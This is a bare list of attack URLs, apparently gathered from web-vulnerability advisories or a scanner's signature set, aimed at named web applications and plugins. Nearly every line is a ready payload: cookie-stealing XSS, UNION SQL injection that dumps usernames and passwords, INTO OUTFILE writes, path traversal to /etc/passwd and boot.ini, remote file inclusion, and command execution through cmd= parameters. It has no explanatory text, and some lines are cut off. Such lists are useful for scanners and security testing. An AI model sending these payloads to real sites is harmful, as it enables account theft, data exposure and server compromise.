/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TE
/portal/projects?project_id=3&project_name=[XSS] 
/admin/DeviceAssociation.do?selectedNo de=%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%6 8%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E% 2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D %6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3 E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C% 2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63 %75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%7 0%74%3E%3C%2F%62%6F%64%79%3ENTServiceConfigurations&classNa me=com.adventnet.me.opmanager.webclient.admin.association.N TServiceAssociation
/%08?action=fullsearch&value=linkto%3A%22%08%22&context=180 http
/oportunidades/presencial/buscador/sinresultado/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{ 
/birt-viewer/run?__report='"><iframe%20src=javascript
/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0
/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3Dhttp%253A//host/&browser=explorer&version=6&javascript=1.3&
/servlet/JavascriptProbe?prevURL=http%3A//host/servlet/JavascriptProbe%3FprevURL%3D%22%3E%3C&browser=explorer&version=6&javascript=1.3&getElem
/index.php/footer/search?searchString='><script>alert('xss')</script> 
/psa/user.do?bxn=umyhome&message=XSS+goes+here+%3cscript%3ealert('XSS')%3c/script%3e 
/profiles/html/simpleSearch.do?name=<IMG%20SRC="vbscript
/nuke73/modules.php?name=FAQ&myfaq=yes&id_cat=1&categories=[xss code here]
/zodiac/servlet/zodiac?action=%3Cscript%3Ealert(document.cookie)%3C/script%3E 
/&com_sun_web_ui_popup=false&HELP_PAGE=/help/%0AX-Tag
/uwc/base/UWCMain?anon=true&calid=test@test.com&caltype=temporaryCalids&date=20081223T143836Z&category=All&viewctx=day&temporaryCalendars=test@test.com%27;alert(%27hello%27);a=%27
/map/traceRoute.do?name=192.168.1.2%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C% 6F%73%74%6D%6F%6E%2E62% 6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%2 0%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3 E%3C%2F%62%6F%64%79%3E 
/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert(&#039;XSS-By-Lament&#039;)</script>
/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert(&#039;XSS-By-Lament&#039;)</script>
/ -d @postdata
/phpmyadmin/ -d a`php -r 'echo str_repeat("[a]",20000);'`=1 
/forum/index.php?navpath=[XSS]
/[path]/view/Classic.view/gallery.php?name=JetPhoto_Album&page=<script>alert(document.cookie);</script>
/include/help.php?base=http
/dir.php
/phpinfo.php" -d `perl -e 'print
/phpscript.php?whatever=../../../../boot.ini%00
/phpscript.php?whatever=..\'file.ext 
/session.php/PHPSESSID=ID;INJECTED=ATTRIBUTE;/ 
/index.php?foo=%00sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss
/files/nst.php.ns?nst=ls -la
/QuickSystems_path/index.php3?DOCUMENT_ROOT=ZoRLu.txt?
/phpinfo.php?cx[][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][]=[XSS]
/phpinfo.php?cx[]=ccccc..~4096chars...ccc[XSS]
/index.php?PHPSESSID="><script>...</script> 
//<input type="text" name="target" value="www.example.com/jupiter/" 
/index.php?lang=english&skin=&debut=0&seeAdd=1&seeNotes=&seeMess=[XSS-Vuln] 
/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
/upb/ -u Alby\n";
/
/cacti/graph_image.php?local_graph_id=[valid_value]&graph_start=%0a[command]%0a
/
/path/showcat.php?forumid=-1%20union%20select%20ModPassword%20from%20modretor
/path/showcat.php?forumid=-1%20union%20select%20ModName%20from%20modretor
 $0 www.example.com /directory/\n";
 $0 www.example.com /directory/\n";
 $0 www.example.com /directory/ \"cat config.php\"\n";
/mybb -1
//evilcode.txt?
//evilcode.txt?
//evilcode.txt??root=http
//evilcode.txt?
/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http
/upload/bin/download.php?filename=../conf/users.conf
/upload/bin/download.php?filename=/etc/passwd
/nuke_path/iframe.php?file=ftp
/nuke_path/htmltonuke.php?filnavn=ftp
/Joomla_path/components/com_joomlaboard/file_upload.php?sbp=http
/[path]/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http
/[path]/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http
/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
 perl livecms33.pl www.example.com/path\n\n";
/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*
/pixlie.php?root=../../../../../etc/passwd%00
/admin/backup_phpwebquest.php
/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*
/administrator/download.php?fileName=../configuration.php
/modules/class/Table.php?sys_conf[path][real]=[Evil_Code]
/files/carprss.php?CarpPath=[Evil_Code]
/main.php?pageURL=[Evil_Code]
/tools/mapFiler.php
/tmp/_<%3fphp%20passthru(base64_decode(
/php/mod_gazetteer_edit.php?gaz= 1 LIMIT 0 UNION 
/index.php?post_id=1+union+select+1,concat(login_id,char(58),password),3,4,5,6,7,8+from+bloo_user/*
/index.php?post_category_id=1+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
/index.php?post_year_month=[NumberIdOfExistentPost]+union+select+1,2,3,4,concat(login_id,char(58),password),6,7,8+from+bloo_user/*
/index.php?static_page_id=1+union+select+1,user(),3,4,5,6/*
/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
/lab/blogworx1.0/view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users
/example.php?site=http
/news/example.php?site=http
/link.php?cat_id=-1/**/union/**/select/**/1,2,3,4,5,6,concat(fname,0x3a,0x3a,0x3a,password,0x3a,0x3a,0x3a,email),8,9,10,11,12,13,14,15,16,17,18/**/from/**/lp_user_tb/*
/mantis/return_dynamic_filters.php?filter_target=
/mantis/manage_user_create.php?username=foo&realn
/mantis/adm_config_set.php?user_id=0&project_id=0
/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-1%20union%20select%201,concat(username,0x3a,password),3,4,5,6%20from%20sys_user--
/[path]/[blog_page_name].php?domain=&arcyear=2007&arcmonth=-11%20union%20select%201,username,3,password,5,6%20from%20sys_user/*
/[PATH]/oneadmin/
/[path]/config.php?rel_path=http
/[path]/info.php
/[path]/index.php?page=Search&category=[BlindSQL]
/fa/qsearch/search.asp?action=search&q=BugReport.ir' or 1=(select top 1 username+'
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;echo+"
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo"+||+dir+||+echo+
/admin/editor/images.php 
/uploader/upload.php";
/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess
/rcblog/config/password.txt
/ninjablog4.8/"; //Don't forget the trailing slash
/ads/ads.dat'. Simple.
/index.php?id=-1 union select 1,concat(id,0x3a,name,0x3a,surname,0x3a,email,0x3a,password),3,4,5,6,7,8,9,10 from users--&page=classified
/[path]/jobdetails.php?jobid=-5 union select 1,2,3,4,5,6,concat(admin,0x3a,email,0x3a,loginname,0x3a,pass),8,9,0,1,2,3,4,5,6,7,8,9,0 from users--
/[path]/cron.php?include_path=http
/[path]/admin/ST_brwosers.php?include_path=http
/[path]/admin/ST_countries.php?include_path=http
/[path]/admin/ST_platforms.php?include_path=http
/wp-admin/profile.php> tmp.html
/index.php?r=membre&v1=member_list
/index.php?r=competition&v1=view&v2=1&v3=1&v4=&v5=all&v6=[XSS]
/[path]/upldgallery.php
/[path]/browse.php?pk=-1 union select @@version,2--
/cache/modules/Emails/abf7c77b-2f71-8071-63ba-4a13
/images/10_poc.php
/components/com_hbssearch/longDesc.php?h_id=1&id=-2%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/longDesc.php?h_id=-1%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--&id=2
/components/com_hbssearch/longDesc.php?hid=5&rid=-32%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail.php?h_id=-5%20union%20select%201,2,3,4,5,6,7,concat%28username,0x3a,password%29,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3%20from%20jos_users--
/components/com_hbssearch/detail1.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail2.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail3.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail4.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail5.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail6.php?h_id=-5%20union%20select%20concat%28username,0x3a,password%29%20from%20jos_users--
/components/com_hbssearch/detail7.php?h_id=-1%20union%20select%201,2,3,concat%28username,0x3a,password%29,5%20from%20jos_users--
/components/com_hbssearch/detail8.php?h_id=-5%20union%20select%201,concat%28username,0x3a,password%29,3,4%20from%20jos_users--
/index.php?option=com_hbssearch&task=showhoteldetails&id=118&adult=2<script>alert(document.cookie);</script>&child=0&r_type=1&chkin=2009-09-15&chkout=2009-09-16&datedif=1&str_day=Tue&end_day=Wed&start_day=Tue&star=
/index.php?p=affichedecision&id=-669 union select 1,2,3,4,5,6,load_file('/etc/passwd'),8+from+mysql.user
/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring
/index.php?page=http
/[path]/index.php?option=com_jreservation&task=propertycpanel&pid=X[blind]
/cd-hotel/index.php?option=com_jreservation&task=propertycpanel&pid=1+and+1=1
/inventory.php?t=N&viewID=3665819[SQL]
//[TARGET]/[PATH]/public/code/cp_html2xhtmlbasic.php?page=http
/wp-admin/admin.php?page=/collapsing-archives/options.txt
/wp-admin/admin.php?page=akismet/readme.txt
/wp-admin/admin.php?page=related-ways-to-take-action/options.php
/wp-admin/admin.php?page=wp-security-scan/securityscan.php
/wp-admin/profile.php> tmp.html
/hlstatsx/hlstats.php?mode=search&q=%3CH1%3EHacked by Sora%3C%2FH1%3E&st=player&game=l4d
/viewArticle.php?id=[value]+and+1=0+[evil query]	|
/snipe/image.php?page=1&search_type=and?_id=78(SQLI)
/component/jesubmit/?view=[sqli]
/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http
/AnantaPatch/index.php?template=../../../../../../../../../../boot.ini%00
/AnantaPatch/admin/index.php?template=../../../../../../../../../../boot.ini%00
/AnantaPatch/forgot.php/>"><ScRiPt>alert("Sweet")</ScRiPt>
/AnantaPatch/search.php?lookup=1>'><ScRiPt%20%0a%0d>alert("Sweet")%3B</ScRiPt>
/AnantaPatch/register.php?=>"'><ScRiPt>alert("Sweet")</ScRiPt>
/AnantaPatch/admin/?=>"'><ScRiPt>alert("Sweet")</ScRiPt>
/register/next
/igamingpath/games.php?order=1[SQLi]&section=111-222-1933email@address.tst&sort=desc
/igamingpath/games.php?order=title&section=111-222-1933email@address.tst'+and+31337-31337='0&sort=desc
/igamingpath/index.php?do=viewarticle&id=1'+and+31337-31337='0
/classi/detail.php?sid=80 and 1=1--             // True ,,
/classi/detail.php?sid=80 and 1=2--            // False ,,
/[path]/admin
/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini
/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E 
/cp.php?do="><script>alert(1)</script>
/el.txt
/orbis/uploads/cmd.php?cmd=cat%20/etc/passwd
/index.php?p=/../../../../../../../../../../../../../../etc/passwd%00
//localhost/OmegaBill_v1.0_Build6/plugins/dompdf/www/examples.php HTTP/1.1
 ./%prog -t www.example.com -d /bacula-web/ -j BackupCatalog -p 80"
/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=yehg.net.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAAAAAAAAAA,&filter_order_Dir=2&limit=3&limitstart=4
/joomla160/index.php/using-joomla/extensions/components/content-component/article-category-list/?filter_order=1,&filter_order_Dir=yehg.net.BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB,&limit=3&limitstart=4
/aphpkb/a_viewusers.php?s=1%20UNION%20SELECT%20load_file(0x2f6574632f706173737764),null,null,null,null,null,null%20limit%200
/downloadfile.php?dwnfile=[LFD]
/downloadfile.php?dwnfile=../library/dbconnect.php
/"><script>alert(document.cookie)</script>'
/Locator/record.php?Dealer_ID=00000026 union all select 1,2,3,4,5,group_concat(Users_Name,0x3a,Users_Password,0x0a),7,8 FROM users--
/wp-content/plugins/photoracer/mostvoted.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7 
/wp-content/plugins/photoracer/mostvoted.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/mostviewed.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/mostviewed.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/crono.php?pid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/crono.php?prid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/changefrom.php?rid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/changeto.php?rid=-1+UNION+SELECT+1,2,3,4,VERSION(),6,7
/wp-content/plugins/photoracer/changefrom.php?rid="><script>alert(1);</script>
/wp-content/plugins/photoracer/changeto.php?rid="><script>alert(1);</script>
/product.php?prodID=[SQLi]
/product.php?prodID=9999 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--
 java phpldos www.example.com /phpldapadmin/ 10\n\n");
//plugins/jbshop/jbshop.php?item_details=1&item_id=-1 union all select group_concat(user_loginname,0x3a,user_password,0x3a,user_admin),2,3,4,5,6,7,8,9,10,11,12,13,14 FROM e107_user--
/newsadd/lerNoticia.php?id=-0'+union+all+select+1,2,VERSION(),4,5+from+usuarios--+
/noticias.php?cat=-1+uniunionon+seleselectct+1,version()--
/blog/wp-content/plugins/wp-automatic/inc/csv.php
/wp-content/backup/backup.log exists.
/modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]
/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1
/iboutique/index.php?mod=products&key=%27
/admin.php3?step=4&option=pass&confirm=flow&newPssword=flow
/banners.php?op=Change&bid=1&url=http
/dnstools.php?section=hosts&user_logged_in=true
/dnstools.php?section=security&user_logged_in=true&user_dnstools_administrator=YES
/dostuff.php?action=modify_user 
/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
/forums/browse.php?fid=3&tid=46&go=<script>JavaScript
/phpBB/phpinfo.php 
/downloads/pafiledb.php?action=email&id=4?"<script>alert('Testing')</script>" 
/downloads/pafiledb.php?action=rate&id=4?"&lt;script&gt;alert('Testing')&lt;/script&gt;" 
/downloads/pafiledb.php?action=download&id=4?"&lt;script&gt;alert('Testing')&lt;/script&gt;"
/templates/form_header.php?noticemsg=<Script>javascript
/quick_reply.php?phpbb_root_path=http
/mambo/administrator/phpinfo.php
/mambo/index.php?Itemid=invalidparameter
/admin/index.php?idsession='%20OR%20''='
/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='
/modif/delete.php?SPGP=[ID]%7C%7C'%20OR%20''=' 
/library/editor/editor.php?root=http
/library/lib.php?root=http
/s8forumfolder/users/any_name.php?cmd=uname%20-a 
/yabbse/Reminder.php?searchtype=esearch&user=[yourusername]'%20or%20memberName='[otherusername] 
/profiles.php?uid=<script>alert(document.cookie)</script>
//profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script>
/users.php?mode=profile&uid=<script>alert(document.cookie)</script>
//comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script>
/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1
/chgpwd.php?USERNAME=[username]&PASSWORD='%20OR%20''='
/admin/index.php?USERNAME='%20OR%20''='&PASSWORD='%20OR%201=1%20AND%20level='1
/room/save_item.php?name=[NAME]&ref=test&photo=../inc/conf.php&photo_type=ttxt
/in.php?
/out.php?
/in.php?id=any_word
/out.php?id=any_word
/in.php?any_word
/out.php?any_word
/user/[NICKNAME].txt 
/admin/system.php3?cmd=[COMMAND] 
/admin/exec.php3?cmd=[COMMAND] 
/myphpnuke/links.php?op=MostPopular&ratenum=[scr!pt]alert(document.cookie);[/scr!pt]&ratetype=percent
/myphpnuke/links.php?op=search&query=[scr!pt]alert('tacettin@olympos.org');[/scr!pt]?query= 
/index.php?file=Team&op=<script>alert('Test');</script>
/index.php?file=News&op=<script>alert('test');</script>
/index.php?file=Liens&op=<script>alert('test');</script> 
/index.php?file=Team&op=phpinfo
/index.php?file=News&op=phpinfo
/index.php?file=Liens&op=phpinfo 
/sendphoto.php?album=..&pic=config.inc.php
/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1 
/cutenews/shownews.php?cutepath=http
/cutenews/search.php?cutepath=http
/cutenews/comments.php?cutepath=http
/admin_t/include/aff_liste_langue.php?rep_include=http
/ipchat.php?root_path=http
/defines.php?WEBCHATPATH=http
/simplebbs/users/users.php
/modules.php?name=AvantGo&file=print&sid=
/modules.php?name=AvantGo&file=print&sid=[Any_Text]
/modules.php?name=News&file=print&sid=
/modules.php?name=News&file=print&sid=[Any_Text]
/modules.php?op=modload&name=Forums&file=attachment&AtchOp=show
/index.php?IDAdmin=test
/index.php?base=test
/index.php?tampon=test
/index.php?SqlQuery=test
/index.php?option=search&searchword=<script>alert(document.cookie);</script>
/search.php?searchfor="><script>alert('test');</script>
/download.php?id=2%
/calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05
/index.php?xoopsOption=any_word
/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
/checkout_payment.php?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
/wp-content/plugins/bbpress/forum.php?id=1&page=[Inject here] 
/banners1.txt 
/banners.php?op=Ok&login='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners1.txt
/banners.php?op=Change&cid='%20OR%201=1%20INTO%20OUTFILE%20'[path/to/site]/banners2.txt
/[poll_dir]/db/info.php
/[poll_dir]/textfile/info.php
/modules.php?name=News&file=article&sid=1&save=1&mode=',user_level='4
/modules.php?name=News&file=article&sid=1&save=1&order=',user_level='4
/modules.php?name=News&file=article&sid=1&save=1&thold=',user_level='4
/modules.php?name=News&file=article&sid=1&save=1&order=',pass='d41d8cd98f00b204e9800998ecf8427e'%20where%20uname='Bob'/*
/viewpage.php?file=/etc/passwd
/modules.php?op=modload&name=Forums&file=viewtopic&topic=1&forum=1'%20INTO%20OUTFILE%20'[path/to/site]/vt.txt
/modules.php?op=modload&name=Forums&file=viewforum&forum='%20OR%201=1%20INTO%20OUTFILE%20'[/path]/vf.txt'/*
/index.php?template=../../../../tmp 
/index.php?lng=../../../../tmp/p
/index.php?lng=../../../../tmp/p 
/index.php?skinid=99+AND+s.hidden%3D0+UNION+SELECT+s.*%2C+t.template%2C+c.password+FROM+ibf_skins+s+LEFT+JOIN+ibf_templates+t+ON+%28t.tmid%3Ds.tmpl_id%
/albums/userpics/Copperminer.jpg.php?[command]
/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1
/login.phpsess=your_session_id&abt=&new_lang=99999&caller=navlang
/start.php?config=alper.inc.php 
/search.php?sess=your_session_id&lookfor=<script>alert
/oscommerce_installation/default.php/cPath/../../../../../ 
/admin/script.php?data=script.php?data=<? system($cmd) ?> 
/index.php?CID=1%20<something>
/board.php?FID=2%20<something>
/member.php?action=profile&UID=1%20<something>
/ttforum/index.php?action=news;board=1;
/install.php?step=7&installdir=http
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=2%20<our_code>
/modules.php?name=Downloads&d_op=getit&lid=2%20<our_code>
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=[any_words]
/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink
/intranet/browse.php?loginname=whocares&parent=1&expand=1&order=creatorid&sortposted=ASC 
/supporter/tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10 
/index.php/article/articleview/<img%20src="javascript
/board/index.php?action=imprefs
/admin/login.php?check=1&admin=1 
/forum/member.php?action=viewpro&member=%3Cdiv%3E%3Cfont%20color=%22red%22%3EMarc%3C/font%3E%3Cscript%3Ealert(%22Ruef%22);%3C/script%3E%3C/div%3E
/admin/objects.inc.php4?Server=http
/modules.php?op=modload&name=Downloads&file=index&req=addrating&ratinglid=[DOWNLOAD ID]&ratinguser=[REMOTE USER]&ratinghost_name=[REMOTE HOST ;-)]&rating=[YOUR RANDOM CONTENT] 
/users.php
/modules/WebChat/out.php
/modules.php?op=modload&name=WebChat&file=index&roomid=Non_Numeric
/modules/WebChat/in.php
/modules/WebChat/quit.php
/modules/WebChat/users.php 
/shoutbox/expanded.php?conf=../../../../../../../targetfile
/shoutbox/expanded.php?conf=../../../../../../../etc/passwd
/shoutbox/expanded.php?conf=../../../../../../../etc/issue 
/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] 
/modules/WebChat/users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);</script>
/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http
/info.php?variable=[code]
/zentrack/index.php?configFile=http
/zentrack/www/index.php?libDir=http
/[INSTALLATION PATH]/dev/VDS/submitted.php?[TARGET
/src/move_messages.php?msg=1&mailbox=[file_you_want_to_move]&startMessage=1&targetMailbox=[target_mailbox_here]
/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file
/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/src/delete_message.php?mailbox=[filehere]&message=1
/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/Path_To_pMachine/lib/weblog.add.php
/Path_To_pMachine/lib/comment.add.php
/Path_To_pMachine/index.php?sfx=
/Path_To_pMachine/inc.lib.php?sfx=
/Path_To_pMachine/inc.cp.php?sfx=
/Path_To_pMachine/search/index.php?weblog=name_of_weblog&keywords=<script code> 
/filemanager/index.php3?action=telecharger&fichier=/etc/passwd
/tutos/file/file_select.php?msg=<hostile code>
/tutos/file/file_new.php?link_id=1065
/tutos/repository/[project number]/[file
/XMBforum/member.phpaction=viewpro&member=admin&lt;script&gt;alert('XSS')&lt;/script&gt;
/XMBforum/buddy.php?action=&lt;script&gt;alert('XSS')&lt;/script&gt;&buddy=&lt;script&gt;alert('XSS')&lt;/script&gt;
/ixmail_netattach.php?file=ixmail_netattach.php
/thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin
/question/crm/download.php?filename=../../../../../../../../../../../../etc/passwd
/download.php?filename=../../../../../../../../../../../../../etc/passwd
/forum/mainfile.php?MAIN_PATH=[attacker's site]
/htmltonuke.php?filnavn=[SCRIPT]%20example.html
/board/docs/
/admin/settings.inc.php
/eventcal2.php.php?path_simpnews=
/eventscroller.php?path_simpnews=
/xxx"><script>alert(document.domain)</script><"
/node/view/666"><script>alert(document.domain)</script>
/atomicboard/index.php?location=../../../../../../etc/passwd
/AtomicBoard-0.6.2/index.php?location=anything
/webcalendar/[filename].php?user_inc=../../../../../etc/passwd
/moregroupware/modules/webmail2/inc/[vuln file]?webmail2_inc_dir=[remote include]
/guestbook/guestbookdat 
/guestbook/pwd
/admin/db.php">
/<galleryfolder>/search.php?searchstring=<script>alert('XSS')</script>
/[PATH]/[LOGIN PAGE].php?[ACCESS DENIED VARIABLE]
/shop/search.php?q='
/shop/show.php?q='
/[PATH]/modules.php?
/[PATH]/modules.php?
/shop/?category=xxxxxx&parent=0&page=x&/'
/shop/php_files/site.config.php
/admin.php?adsess='><script>window.open
/pathofstellardocs/data/fetch.php?page='
/pathofstorebuilder/index.php?cat='
/pathofzorum/index.php?method=<script>alert('test')
/path/nw/article.php?id='
/[PATH]/index.php?module=calendar&calendar[view]
/[PATH]/index.php?module=calendar&calendar[view]
/[PATH]/index.php?module=calendar&calendar[view]
/[PATH]/index.php?module=fatcat&fatcat[user]
/[PATH]/index.php?
/[PATH]/index.php?
/forum/index.php?method=userfunctions&'list=secmenu&
/pathofhostadmin/?page='
/path_of_hola/admin/cms/htmltags.php?datei=./sec/data.php
/clients/packages.php?id=-1'+UNION+ALL+SELECT+1,CONCAT(username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+adminusers%23
/index.php?menuitem=29+AND+1=2+UNION+ALL+SELECT+version()--
/script>&aktie=Zoek&idx=23
/php/gaestebuch/admin/index.php?do=options&action=optionsok&new_username=regularuser&new_password=regularpass&new_rights=admin&user=regularuser&pass=regularpass
/FusionNews/?
/nphp/nphpd.php?nphp_config[LangFile]=/evil/file 
/admin/admin.php?adminpy=1 
/pass_done.php?Submit=1&email='%20OR%203%20IN%20(1,2,3)%20INTO%20OUTFILE%20'/complete/path/file.txt 
/index.php3 
/?lng=<script> 
/mod.php?mod=<evil_code>
/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat&cid=dudul 
/invitefriends.php3?action=http
/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>
/webcalendar/week.php?user="><script>alert(document.cookie)</script>
/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>
/webcalendar/week.php?eventinfo=<script src=http
/webcalendar/view_m.php?id=additional sql command
/webcalendar/login.php?user='additional%20sqlcommand
/webcalendar/login.php?password='additional%20sql%20command 
/login.php?error=<script>(document.cookie)</script> 
/url]
